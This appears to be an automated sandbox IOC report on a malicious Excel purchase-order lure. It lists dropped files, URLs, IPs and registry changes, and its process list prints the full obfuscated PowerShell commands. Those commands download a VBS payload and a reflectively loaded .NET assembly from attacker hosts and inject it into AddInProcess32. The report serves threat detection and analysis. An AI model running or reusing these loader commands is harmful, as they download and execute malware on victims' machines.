IOC Report
Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx

loading gif

Files

File Path
Type
Category
Malicious
Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 19 13:01:02 2024, Security: 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingswithgreatsituationshandletotheprogress[1].hta
HTML document, ASCII text, with very long lines (65536), with no line terminators
modified
malicious
C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\~DFC601DD9C0FBA6613.TMP
Composite Document File V2 Document, Cannot read section info
dropped
malicious
C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS
Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\~$Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx
data
modified
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethebestthingsentiretimewithgreatthingswithloverkiss[1].tiff
Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\11E2C553.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\883E1738.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B755764F.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB16081A.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (370)
dropped
C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\2ejdq4gg\CSC8D7D0D2F906B46909F7C7CB8135B630.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\2hj44iz0.hsm.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\4s3ntpk1.fz4.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx
Microsoft Excel 2007+
dropped
C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\RES6826.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 06:50:07 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\bgrhzi3g.hdl.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\e42ly0jz.jlc.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\htbay350.5by.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\kw1juh5f.dvh.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\qn1vb4c0.vwb.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ug2kumtg.szq.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF1E87EF4C543DF07F.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFA189BEBEAD81AD87.TMP
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
data
dropped
C:\Users\user\Desktop\62A30000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 06:50:19 2024, Security: 1
dropped
C:\Users\user\Desktop\62A30000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\Env#U00edo de Orden de Compra No. 43456435344657.xla.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 06:50:19 2024, Security: 1
dropped
There are 25 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)| .((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6826.tmp" "c:\Users\user\AppData\Local\Temp\2ejdq4gg\CSC8D7D0D2F906B46909F7C7CB8135B630.TMP"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
There are 2 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://1017.filemail.com/api/file/get?filekey=2
unknown
malicious
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta
192.3.22.13
malicious
http://192.3.22.13/352/WRFFRF.txt
192.3.22.13
malicious
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF
192.3.22.13
malicious
https://1017.filemail.com/api/file/get?filek
unknown
malicious
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
unknown
http://192.3.22.13/xampp/se/seet
unknown
http://nuget.org/NuGet.exe
unknown
https://account.dyn.com/
unknown
http://crl.entrust.net/server1.crl0
unknown
http://ocsp.entrust.net03
unknown
https://provit.uk/wUE3Zl?&temple=standing&steps=overwrought&official=hushed&pressurisation
198.244.140.41
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://provit.uk/
unknown
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
142.215.209.78
https://1017.filemail.com
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://provit.uk/v
unknown
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htarisationM
unknown
http://go.micros
unknown
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFdll
unknown
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFC:
unknown
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFp
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://provit.uk/b
unknown
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta...p
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta;
unknown
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htahttp://192.3.22.13/
unknown
http://ip-api.com
unknown
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htaAcC:
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
http://192.3.22.13/
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 30 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
provit.uk
198.244.140.41
ip-api.com
208.95.112.1
ip.1017.filemail.com
142.215.209.78
1017.filemail.com
unknown

IPs

IP
Domain
Country
Malicious
192.3.22.13
unknown
United States
malicious
142.215.209.78
ip.1017.filemail.com
Canada
208.95.112.1
ip-api.com
United States
198.244.140.41
provit.uk
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
v%/
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
,+/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3B3F4
3B3F4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileDirectory
There are 59 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
402000
remote allocation
page execute and read and write
malicious
584000
heap
page read and write
52E5000
heap
page read and write
363E000
trusted library allocation
page read and write
52E7000
heap
page read and write
190000
heap
page read and write
52D3000
heap
page read and write
110000
heap
page read and write
C4D000
stack
page read and write
37A000
heap
page read and write
37E0000
trusted library allocation
page read and write
1DA5000
heap
page read and write
1E33000
direct allocation
page read and write
1CA10000
heap
page read and write
7FE89A53000
trusted library allocation
page read and write
1D80000
direct allocation
page read and write
503000
heap
page read and write
4F21000
heap
page read and write
122B1000
trusted library allocation
page read and write
1AA40000
heap
page read and write
291000
heap
page read and write
348000
trusted library allocation
page read and write
173000
heap
page read and write
4AB000
heap
page read and write
2FB000
heap
page read and write
2AA000
heap
page read and write
247E000
trusted library allocation
page read and write
1B076000
heap
page read and write
1BE0000
heap
page read and write
1CD000
trusted library allocation
page execute and read and write
2306000
trusted library allocation
page read and write
7FE89BB0000
trusted library allocation
page read and write
20000
heap
page read and write
5234000
heap
page read and write
4F25000
heap
page read and write
7FE89A5C000
trusted library allocation
page read and write
53E000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
479000
heap
page read and write
3C9D000
stack
page read and write
47B000
heap
page read and write
50DC000
heap
page read and write
1A7EF000
stack
page read and write
25DC000
trusted library allocation
page read and write
50DC000
heap
page read and write
1A76B000
stack
page read and write
3B84000
heap
page read and write
2A34000
heap
page read and write
5F0000
heap
page read and write
1E27000
direct allocation
page read and write
B3E000
stack
